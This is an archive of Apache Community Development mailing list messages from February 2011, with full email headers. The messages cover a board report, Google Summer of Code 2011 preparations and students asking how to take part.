+0000 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: February board report Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - zencphosting06.zen.co.uk X-AntiAbuse: Original Domain - community.apache.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - apache.org Apologies for the lateness of this (and thus there being no time for ComDev feedback). I'm currently off work sick (nothing serious) and completely forgot as a result. Here's the ComDev board report for February 2010 Status report for the Apache Community Development Project Project Status -------------- The Community Development is progressing well, although a little more slowly than some whould have hoped. No issues require board attention at this time. Community Google Summer of Code 2011 is in preparation stages. For the first time we have more admin volunteers than we need - which is great. The EU project (OpenSE) that planned to bring students to our mentoring programme is about to commence its second pilot run. In the first run we had a number of interested enquiries but nobody actually started work as a mentee. On the one hand this is a dissapointment, on the othe it is good to know that our ASF volunteers are not wasting time on the initial phases of engaging mentees that, ultimately, bring nothing to the project. The OpenSE team believes the main barrier is the high expectations we have of students - we make it clear that they must be self-motivated and results oriented. This coupled with the reputaton of the ASF appears to be intimidating potential mentees. In the next pilot the learning assitants are focussing on the career advantages experience with ASF projects can bring and are introducing a "community game" which will introduce students to the idea of engaging in public. Apache-extras.org was launched. As agreed the committee is hands off on the management of this site. There are currently 89 projects listed. Objectives for next period * Coordinate Google Summer of Code * Analyse use of apache-extras.org From [email protected] Tue Feb 15 23:13:27 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64306 invoked from network); 15 Feb 2011 23:13:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Feb 2011 23:13:26 -0000 Received: (qmail 50973 invoked by uid 500); 15 Feb 2011 23:13:26 -0000 Delivered-To: [email protected] Received: (qmail 50868 invoked by uid 500); 15 Feb 2011 23:13:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50860 invoked by uid 99); 15 Feb 2011 23:13:25 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 15 Feb 2011 23:13:25 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=5.0 tests=MIME_QP_LONG_LINE,RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO cpanelsmarthost1.zen.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 15 Feb 2011 23:13:17 +0000 Received: from [161.129.204.104] (helo=zencphosting06.zen.co.uk) by cpanelsmarthost1.zen.co.uk with esmtp (Exim 4.69) (envelope-from <[email protected]>) id 1PpU4m-00084C-NR for [email protected]; Tue, 15 Feb 2011 23:12:56 +0000 Received: from [161.129.204.104] (helo=[161.129.204.104]) by zencphosting06.zen.co.uk with esmtps (TLSv1:AES128-SHA:128) (Exim 4.69) (envelope-from <[email protected]>) id 1PpU4i-00048s-5X for [email protected]; Tue, 15 Feb 2011 23:12:56 +0000 Subject: Re: February board report References: <[email protected]> From: Ross Gardler <[email protected]> Content-Type: text/plain; charset=us-ascii X-Mailer: iPhone Mail (8C148a) In-Reply-To: <[email protected]> Message-Id: <[email protected]> Date: Tue, 15 Feb 2011 23:12:00 +0000 To: "[email protected]" <[email protected]> Content-Transfer-Encoding: quoted-printable Mime-Version: 1.0 (iPhone Mail 8C148a) X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - zencphosting06.zen.co.uk X-AntiAbuse: Original Domain - community.apache.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - apache.org X-Virus-Checked: Checked by ClamAV on apache.org Sent from my mobile device. On 15 Feb 2011, at 20:08, Ross Gardler <[email protected]> wrote: > Apologies for the lateness of this And spoils for not submitting in the correct form. Will be more careful next= time.=20 Ross > (and thus there being no time for ComDev feedback). I'm currently off work= sick (nothing serious) and completely forgot as a result. >=20 > Here's the ComDev board report for February 2010 >=20 > Status report for the Apache Community Development Project >=20 > Project Status > -------------- >=20 >=20 > The Community Development is progressing well, although a little more slow= ly than some whould have hoped. >=20 > No issues require board attention at this time. >=20 > Community >=20 > Google Summer of Code 2011 is in preparation stages. For the first time we= have more admin volunteers than we need - which is great. >=20 > The EU project (OpenSE) that planned to bring students to our mentoring pr= ogramme is about to commence its second pilot run. In the first run we had a= number of interested enquiries but nobody actually started work as a mentee= . On the one hand this is a dissapointment, on the othe it is good to know t= hat our ASF volunteers are not wasting time on the initial phases of engagin= g mentees that, ultimately, bring nothing to the project. The OpenSE team be= lieves the main barrier is the high expectations we have of students - we ma= ke it clear that they must be self-motivated and results oriented. This coup= led with the reputaton of the ASF appears to be intimidating potential mente= es. In the next pilot the learning assitants are focussing on the career adv= antages experience with ASF projects can bring and are introducing a "commun= ity game" which will introduce students to the idea of engaging in public. >=20 > Apache-extras.org was launched. As agreed the committee is hands off on th= e management of this site. There are currently 89 projects listed. >=20 > Objectives for next period >=20 > * Coordinate Google Summer of Code > * Analyse use of apache-extras.org From [email protected] Wed Feb 16 06:56:00 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72988 invoked from network); 16 Feb 2011 06:56:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2011 06:56:00 -0000 Received: (qmail 48039 invoked by uid 500); 16 Feb 2011 06:56:00 -0000 Delivered-To: [email protected] Received: (qmail 47896 invoked by uid 500); 16 Feb 2011 06:55:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47888 invoked by uid 99); 16 Feb 2011 06:55:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Feb 2011 06:55:56 +0000 X-ASF-Spam-Status: No, hits=-0.7 required=5.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_LOW,RFC_ABUSE_POST,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iw0-f170.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Feb 2011 06:55:50 +0000 Received: by iwn6 with SMTP id 6so1044229iwn.29 for <[email protected]>; Tue, 15 Feb 2011 22:55:29 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:mime-version:sender:date:x-google-sender-auth :message-id:subject:from:to:content-type; bh=Eb79oxfzyvKBz5QZGmexCloaFr7hksnkcVrdT0djBmU=; b=EgwTuz8JqvfhBkS7gEZKIkzKfa6bLXkL3Gwa6p8hCWc5Hgd9YOt3TdWcDrtfcC7H4u 02XacyMu4/Qqbsz4HrsaziSOnfH1M31D/ymzg+RjKovj9eFQxKJqJmZP480TSeb8TudZ 416j5fnyjerQ92Ei60kPjIT0T3UnJut6RRpRU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=mime-version:sender:date:x-google-sender-auth:message-id:subject :from:to:content-type; b=dPuuuuDsgI4MrGEjxtlgSGfo0kcAAJtmE+IJKbIO8OSCBBJgDsuoniKMMqi++6Ol/U PhUCVfmXbjPi3vQZoCWOUOJd1BUCuM583nmBFaaKLTc8anMDVMMb4wjM6vwhSPodeYpe LveIAZ+MrSU2xTPjMaMPQyc4nkpJ6okC9K/zU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id bt2mr262193icb.326.1297839328919; Tue, 15 Feb 2011 22:55:28 -0800 (PST) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Tue, 15 Feb 2011 22:55:28 -0800 (PST) Date: Wed, 16 Feb 2011 07:55:28 +0100 X-Google-Sender-Auth: Iu6E3hLTJdrVEKXsmO63NS9lHLI Message-ID: <[email protected]> Subject: GSOC 2011 preperations From: Norman Maurer <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org Hi there, after some very busy weeks I'm back on track to prepare for GSOC 2011. I talked to Gavin about what todo for projects to "tag" JIRA issues which are a good fit for GSOC. As we now on JIRA 4 we can use labels again (as it has label support build in). Now some questions on the "old mentors": * Did you tell the PMCs about GSOC applications before the ASF was choosen the years before (so they can ready in time ;)) ? * Does someone of you have some "old" application stored so I could have a look how it was filled the years before ? Ps: I hope its ok that I just "took" the lead for now ;) Bye, Norman From [email protected] Wed Feb 16 08:53:01 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10630 invoked from network); 16 Feb 2011 08:53:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2011 08:53:01 -0000 Received: (qmail 46538 invoked by uid 500); 16 Feb 2011 08:53:01 -0000 Delivered-To: [email protected] Received: (qmail 46387 invoked by uid 500); 16 Feb 2011 08:52:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46379 invoked by uid 99); 16 Feb 2011 08:52:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Feb 2011 08:52:57 +0000 X-ASF-Spam-Status: No, hits=0.7 required=5.0 tests=SPF_HELO_PASS,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO uli.spielviel.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 Feb 2011 08:52:50 +0000 Received: from [161.129.204.104] (maracaibo.imp.fu-berlin.de [161.129.204.104]) by uli.spielviel.de (Postfix) with ESMTPSA id 1EBE9BF401 for <[email protected]>; Wed, 16 Feb 2011 09:52:28 +0100 (CET) Message-ID: <[email protected]> Date: Wed, 16 Feb 2011 09:52:27 +0100 From: =?ISO-8859-1?Q?Ulrich_St=E4rk?= <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSOC 2011 preperations References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit http://svn.apache.org/repos/asf/comdev/gsoc/ is one place to look. It seems that the 2009 application is there. I guess the rest is in pmc/comdev? Uli On 16.02.2011 07:55, Norman Maurer wrote: > Hi there, > > after some very busy weeks I'm back on track to prepare for GSOC 2011. > I talked to Gavin about what todo for projects to "tag" JIRA issues > which are a good fit for GSOC. As we now on JIRA 4 we can use labels > again (as it has label support build in). > > > Now some questions on the "old mentors": > > * Did you tell the PMCs about GSOC applications before the ASF was > choosen the years before (so they can ready in time ;)) ? > * Does someone of you have some "old" application stored so I could > have a look how it was filled the years before ? > > Ps: I hope its ok that I just "took" the lead for now ;) > > Bye, > Norman From [email protected] Tue Feb 22 00:34:12 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41459 invoked from network); 22 Feb 2011 00:34:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Feb 2011 00:34:11 -0000 Received: (qmail 57772 invoked by uid 500); 22 Feb 2011 00:34:11 -0000 Delivered-To: [email protected] Received: (qmail 57686 invoked by uid 500); 22 Feb 2011 00:34:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57678 invoked by uid 99); 22 Feb 2011 00:34:10 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 00:34:10 +0000 X-ASF-Spam-Status: No, hits=1.5 required=5.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_LOW,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gy0-f170.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 00:34:02 +0000 Received: by gyf3 with SMTP id 3so762225gyf.29 for <[email protected]>; Mon, 21 Feb 2011 16:33:42 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:date:message-id:subject:from:to :content-type; bh=1yAwYxQloD0052nasvWLK5Eukd8XHq4eEj9kjXPd20M=; b=R4DS2RKefka2TliX23u+i0/oozD+1Qq1wC1PZjrl+lfbYl1IR7pp7t1lAMa8Ipf/3z Kif2ySd7KGEk5dof17sZ6rNFI1IYwd3LQA0b06c9AKPYDMPkouSQPl1GjSOBxiuFNlke u3VHAef6ni4JtLG8y8t/sRlr/8+HjPn4XxKTc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=NfuXbG3X8ZVfB5oYtv5xHtgtOVIHG/njfvePiCMWVeBMpL64JVrqLWDoXhxYB+foW/ EKT38qQx8rqEvvixlFNpnMdZ7uxZzbeuF2HWgCyPvCXRBiNGYKkMNp0k0pK2sjL8gof/ 5AA9vfOTsezWs8HvqhDJlIoV7ziFRAzFiEXaE= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id i16mr2557387ybm.65.1298334822200; Mon, 21 Feb 2011 16:33:42 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 21 Feb 2011 16:33:42 -0800 (PST) Date: Mon, 21 Feb 2011 16:33:42 -0800 Message-ID: <[email protected]> Subject: Regarding GSoC From: rukhsana afroz <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00151751141ae0740d049cd42169 X-Virus-Checked: Checked by ClamAV on apache.org --00151751141ae0740d049cd42169 Content-Type: text/plain; charset=ISO-8859-1 Hi, I want to address the attention from the administrative people of this group. Are you participating in GSoC program this year? If so, which part of this project, you want to enhance? If you could give me a little bit idea about that, it would be great help for me. I am very interested to work on this project. Thanks Ruby -- Rukhsana Ruby Phd Student Department of Electrical & Computer Engineering The University of British Columbia ============================ --00151751141ae0740d049cd42169-- From [email protected] Tue Feb 22 08:17:37 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26936 invoked from network); 22 Feb 2011 08:17:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Feb 2011 08:17:37 -0000 Received: (qmail 55909 invoked by uid 500); 22 Feb 2011 08:17:36 -0000 Delivered-To: [email protected] Received: (qmail 55753 invoked by uid 500); 22 Feb 2011 08:17:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55745 invoked by uid 99); 22 Feb 2011 08:17:33 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 08:17:33 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED,T_RP_MATCHES_RCVD X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 22 Feb 2011 08:17:31 +0000 Received: (qmail 26843 invoked by uid 99); 22 Feb 2011 08:17:09 -0000 Received: from localhost.apache.org (HELO mail-vw0-f42.google.com) (161.129.204.104) (smtp-auth username bdelacretaz, mechanism plain) by minotaur.apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 08:17:09 +0000 Received: by vws10 with SMTP id 10so2089028vws.29 for <[email protected]>; Tue, 22 Feb 2011 00:17:07 -0800 (PST) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id ct13mr487549vcb.232.1298362627264; Tue, 22 Feb 2011 00:17:07 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 22 Feb 2011 00:17:07 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 22 Feb 2011 09:17:07 +0100 Message-ID: <[email protected]> Subject: Re: Regarding GSoC From: Bertrand Delacretaz <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 X-Virus-Checked: Checked by ClamAV on apache.org Hi, On Tue, Feb 22, 2011 at 1:33 AM, rukhsana afroz <[email protected]> wrote: > ...I want to address the attention from the administrative people of this > group. Are you participating in GSoC program this year?... See http://community.apache.org/gsoc.html > If so, which part of this project, you want to enhance? If you could give me a little bit idea > about that, it would be great help for me. I am very interested to work on > this project.... The ASF is not just one project, you'll need to get in touch with the one that interests you, see http://projects.apache.org/ -Bertrand From [email protected] Tue Feb 22 08:22:29 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28263 invoked from network); 22 Feb 2011 08:22:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Feb 2011 08:22:29 -0000 Received: (qmail 60756 invoked by uid 500); 22 Feb 2011 08:22:28 -0000 Delivered-To: [email protected] Received: (qmail 60602 invoked by uid 500); 22 Feb 2011 08:22:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60594 invoked by uid 99); 22 Feb 2011 08:22:25 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 08:22:25 +0000 X-ASF-Spam-Status: No, hits=1.5 required=5.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_LOW,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-yi0-f42.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 08:22:18 +0000 Received: by yia28 with SMTP id 28so3011321yia.29 for <[email protected]>; Tue, 22 Feb 2011 00:21:57 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:in-reply-to:references:date :message-id:subject:from:to:content-type; bh=03CfvFKvFdbsiyjyuSDQ809pwIB0mxTGeuBxLPt1QUw=; b=wMP0307triZB1heXvMvAVzSt0rQYw46tf+aoVf0sVX3JZAxMbasyAO7a+KsxT2gap1 qXJWQpdUFvP3xqxe0tT1ykEZjP4kxYFA4R0Fa2/9l2+F6OrcbyQ1pRMOFeKl/UUW2JUW h/oLcIcwMYgKmYLU5GaGEK3zAbhu9lF7k3zt0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=SjP/2+AMkctVpyfiqQJrFy9MxrigJ83PX78wHSsWoRTJ8Ab7nl8W063edykKuhSU6d 6TNAhs2KDpAi6k3mHjQW7BNhZwkL3zNiKnp85ZU7y5WoCgZu1IsJij0ytsS75rmZUFdJ JihQgrYIvJeE3yUAxe7Uy2FjlVnG81fa6yAU4= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id i16mr3016287ybm.65.1298362917732; Tue, 22 Feb 2011 00:21:57 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 22 Feb 2011 00:21:57 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Tue, 22 Feb 2011 00:21:57 -0800 Message-ID: <[email protected]> Subject: Re: Regarding GSoC From: rukhsana afroz <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00151751141a8042c3049cdaac9e --00151751141a8042c3049cdaac9e Content-Type: text/plain; charset=ISO-8859-1 Hi Bertrand, I know ASF has large number of projects. How will I know which project group is participating in GSoC program this year? Please help me on this. Thanks Ruby On Tue, Feb 22, 2011 at 12:17 AM, Bertrand Delacretaz < [email protected]> wrote: > Hi, > > On Tue, Feb 22, 2011 at 1:33 AM, rukhsana afroz > <[email protected]> wrote: > > ...I want to address the attention from the administrative people of this > > group. Are you participating in GSoC program this year?... > > See http://community.apache.org/gsoc.html > > > If so, which part of this project, you want to enhance? If you could give > me a little bit idea > > about that, it would be great help for me. I am very interested to work > on > > this project.... > > The ASF is not just one project, you'll need to get in touch with the > one that interests you, see http://projects.apache.org/ > > -Bertrand > -- Rukhsana Ruby Phd Student Department of Electrical & Computer Engineering The University of British Columbia ============================ --00151751141a8042c3049cdaac9e-- From [email protected] Tue Feb 22 09:45:43 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63354 invoked from network); 22 Feb 2011 09:45:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Feb 2011 09:45:43 -0000 Received: (qmail 76516 invoked by uid 500); 22 Feb 2011 09:45:43 -0000 Delivered-To: [email protected] Received: (qmail 76360 invoked by uid 500); 22 Feb 2011 09:45:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76350 invoked by uid 99); 22 Feb 2011 09:45:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 09:45:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED,T_RP_MATCHES_RCVD X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 22 Feb 2011 09:45:37 +0000 Received: (qmail 63027 invoked by uid 99); 22 Feb 2011 09:45:16 -0000 Received: from localhost.apache.org (HELO mail-vw0-f42.google.com) (161.129.204.104) (smtp-auth username jakobk, mechanism plain) by minotaur.apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Feb 2011 09:45:16 +0000 Received: by vws10 with SMTP id 10so2133684vws.29 for <[email protected]>; Tue, 22 Feb 2011 01:45:15 -0800 (PST) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id yf4mr3505829vdb.12.1298367915221; Tue, 22 Feb 2011 01:45:15 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 22 Feb 2011 01:45:15 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Tue, 22 Feb 2011 10:45:15 +0100 Message-ID: <[email protected]> Subject: Re: Regarding GSoC From: Jakob Korherr <[email protected]> To: [email protected] Cc: rukhsana afroz <[email protected]> Content-Type: text/plain; charset=UTF-8 X-Virus-Checked: Checked by ClamAV on apache.org Hi Ruby, Look for an apache project that you are interested in and get in touch with the developers (via the dev mailing list of this project). If you show great interest on the project and want to contribute to it through GSoC, I am sure that there will be someone who agrees to mentor you ;) Regards, Jakob 2011/2/22 rukhsana afroz <[email protected]>: > Hi Bertrand, > > I know ASF has large number of projects. How will I know which project group > is participating in GSoC program this year? Please help me on this. > > Thanks > Ruby > > On Tue, Feb 22, 2011 at 12:17 AM, Bertrand Delacretaz < > [email protected]> wrote: > >> Hi, >> >> On Tue, Feb 22, 2011 at 1:33 AM, rukhsana afroz >> <[email protected]> wrote: >> > ...I want to address the attention from the administrative people of this >> > group. Are you participating in GSoC program this year?... >> >> See http://community.apache.org/gsoc.html >> >> > If so, which part of this project, you want to enhance? If you could give >> me a little bit idea >> > about that, it would be great help for me. I am very interested to work >> on >> > this project.... >> >> The ASF is not just one project, you'll need to get in touch with the >> one that interests you, see http://projects.apache.org/ >> >> -Bertrand >> > > > > -- > Rukhsana Ruby > Phd Student > Department of Electrical & Computer Engineering > The University of British Columbia > ============================ > -- Jakob Korherr blog: http://www.jakobk.com twitter: http://twitter.com/jakobkorherr work: http://www.irian.at From [email protected] Wed Feb 23 13:52:35 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22824 invoked from network); 23 Feb 2011 13:52:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Feb 2011 13:52:35 -0000 Received: (qmail 12567 invoked by uid 500); 23 Feb 2011 13:52:34 -0000 Delivered-To: [email protected] Received: (qmail 12407 invoked by uid 500); 23 Feb 2011 13:52:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 97746 invoked by uid 99); 23 Feb 2011 13:42:54 -0000 X-ASF-Spam-Status: No, hits=-0.7 required=5.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_LOW,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:date:message-id:subject:from:to :content-type; bh=kO8djR08f31Oai3eBzuJgtnw0DT3HQHJ7pJXzbMW8sY=; b=dwRC0GdYvu8b1oo2Tg4lk7ZeNVJNUXVOEEfVNLcuX2vXVsbix6uvaW8bfltAn1IYYy ZZxDulAgCXkxtPXORtsti+eSvk/1WJIXfL7HOnb9rZggKrv4oZA9jE0g8TcZ0rUn9r7+ fse1mYlrsYoUuPna09NhptzqJt9daQGq8RmuM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=aZZFG2ynfNk+3U4ZeRv9zviiKlFbOs3YK7lfef6B5igzTZ0cSmpYijjSiFjx/qB5d7 0yJluDxoCRXuBzZv5IdxlqG6KxEwuZu1qhKKTO/m0g17Mh11S9vQxJMsyC2bTnylsWMM epLV3SzHSseGK2O5ASpDIKs/SATFrED1V5rss= MIME-Version: 1.0 Date: Wed, 23 Feb 2011 19:12:25 +0530 Message-ID: <[email protected]> Subject: GSoC 2011 From: Pasindu Ariyarathna <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org I am computer Engineering Student and I'm willing to participate Google summer of code competition this year. I have seen your last year completed projects and I am interested in that kind of projects . So I would like to know up to what extent of programming knowledge is required to successfully complete a project of your organization this year. thank you -- Pasindu Pavithra Ariyarathna From [email protected] Wed Feb 23 14:03:58 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30289 invoked from network); 23 Feb 2011 14:03:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Feb 2011 14:03:58 -0000 Received: (qmail 40210 invoked by uid 500); 23 Feb 2011 14:03:57 -0000 Delivered-To: [email protected] Received: (qmail 40049 invoked by uid 500); 23 Feb 2011 14:03:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40041 invoked by uid 99); 23 Feb 2011 14:03:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 23 Feb 2011 14:03:53 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=5.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO relay5.mail.ox.ac.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with 